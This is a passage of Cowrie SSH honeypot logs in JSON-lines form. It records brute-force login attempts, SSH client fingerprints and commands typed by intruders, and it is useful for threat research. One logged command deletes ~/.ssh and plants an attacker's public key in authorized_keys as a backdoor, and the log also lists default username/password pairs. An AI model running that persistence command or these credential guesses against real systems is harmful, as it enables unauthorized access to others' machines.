lib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:47:19.398293Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.login.success","username":"root","password":"robert","message":"login attempt [root/robert] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:47:20.296522Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:47:20.744778Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:47:20.745497Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:47:20.746280Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:20.961236Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:47:21.449542Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:47:21.450277Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:47:21.668722Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:21.669710Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56000,"dst_ip":"1.2.3.4","dst_port":22,"session":"43bc4c6c0dab","protocol":"ssh","message":"New connection: 212.227.235.229:56000 (1.2.3.4:22) [session: 43bc4c6c0dab]","sensor":"my-vps","timestamp":"2025-08-31T06:47:21.885961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:47:21.888415Z","src_ip":"212.227.235.229","session":"43bc4c6c0dab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:47:22.106946Z","src_ip":"212.227.235.229","session":"43bc4c6c0dab"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:47:22.979022Z","src_ip":"212.227.235.229","session":"43bc4c6c0dab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:47:23.508496Z","src_ip":"212.227.125.160","session":"939c320a7e13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:47:23.509720Z","src_ip":"212.227.125.160","session":"939c320a7e13"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:24.199807Z","src_ip":"212.227.235.229","session":"43bc4c6c0dab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38467,"dst_ip":"1.2.3.4","dst_port":22,"session":"584b7db91f80","protocol":"ssh","message":"New connection: 212.227.235.229:38467 (1.2.3.4:22) [session: 584b7db91f80]","sensor":"my-vps","timestamp":"2025-08-31T06:47:24.430175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:47:24.431859Z","src_ip":"212.227.235.229","session":"584b7db91f80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:47:24.662444Z","src_ip":"212.227.235.229","session":"584b7db91f80"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:47:24.816082Z","src_ip":"212.227.235.229","session":"3c4aed7dedd1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:47:25.591161Z","src_ip":"212.227.235.229","session":"584b7db91f80"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:25.823368Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:25.824390Z","src_ip":"212.227.235.229","session":"584b7db91f80"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:26.609457Z","src_ip":"212.227.235.229","session":"3c4aed7dedd1"}
{"eventid":"cowrie.session.connect","src_ip":"149.100.11.243","src_port":51144,"dst_ip":"1.2.3.4","dst_port":22,"session":"4119d10402b1","protocol":"ssh","message":"New connection: 149.100.11.243:51144 (1.2.3.4:22) [session: 4119d10402b1]","sensor":"my-vps","timestamp":"2025-08-31T06:47:30.614236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:47:30.615410Z","src_ip":"149.100.11.243","session":"4119d10402b1"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:30.667605Z","src_ip":"149.100.11.243","session":"4119d10402b1"}
{"eventid":"cowrie.session.closed","duration":"62.7","message":"Connection lost after 62.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:32.319395Z","src_ip":"212.227.235.229","session":"ced32e7a428b"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:37.606140Z","src_ip":"212.227.125.160","session":"409392d6fb30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50382,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba26a758d8aa","protocol":"ssh","message":"New connection: 212.227.125.160:50382 (1.2.3.4:22) [session: ba26a758d8aa]","sensor":"my-vps","timestamp":"2025-08-31T06:47:39.249912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:47:39.990192Z","src_ip":"212.227.125.160","session":"ba26a758d8aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:47:39.991185Z","src_ip":"212.227.125.160","session":"ba26a758d8aa"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:47:42.393214Z","src_ip":"212.227.125.160","session":"ba26a758d8aa"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:47:43.935809Z","src_ip":"212.227.125.160","session":"ba26a758d8aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40080,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b0cfec0cef8","protocol":"ssh","message":"New connection: 212.227.235.229:40080 (1.2.3.4:22) [session: 7b0cfec0cef8]","sensor":"my-vps","timestamp":"2025-08-31T06:47:47.201162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:47:59.537730Z","src_ip":"212.227.235.229","session":"7b0cfec0cef8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:47:59.538582Z","src_ip":"212.227.235.229","session":"7b0cfec0cef8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41020,"dst_ip":"1.2.3.4","dst_port":22,"session":"71a38a1c1b4a","protocol":"ssh","message":"New connection: 212.227.125.160:41020 (1.2.3.4:22) [session: 71a38a1c1b4a]","sensor":"my-vps","timestamp":"2025-08-31T06:47:59.768664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:48:00.721406Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:48:00.722057Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-31T06:48:03.533660Z","src_ip":"212.227.125.160","session":"939c320a7e13"}
{"eventid":"cowrie.login.success","username":"root","password":"solu","message":"login attempt [root/solu] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:48:06.088180Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:48:08.766381Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T06:48:08.767160Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:10.749229Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:10.750303Z","src_ip":"212.227.125.160","session":"71a38a1c1b4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39030,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fa7f57181b6","protocol":"ssh","message":"New connection: 212.227.235.229:39030 (1.2.3.4:22) [session: 6fa7f57181b6]","sensor":"my-vps","timestamp":"2025-08-31T06:48:16.832954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:48:17.988574Z","src_ip":"212.227.235.229","session":"6fa7f57181b6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:48:17.992712Z","src_ip":"212.227.235.229","session":"6fa7f57181b6"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55518,"dst_ip":"1.2.3.4","dst_port":22,"session":"178ccddc0a8f","protocol":"ssh","message":"New connection: 201.148.180.50:55518 (1.2.3.4:22) [session: 178ccddc0a8f]","sensor":"my-vps","timestamp":"2025-08-31T06:48:18.481600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:48:19.851229Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:48:19.851952Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
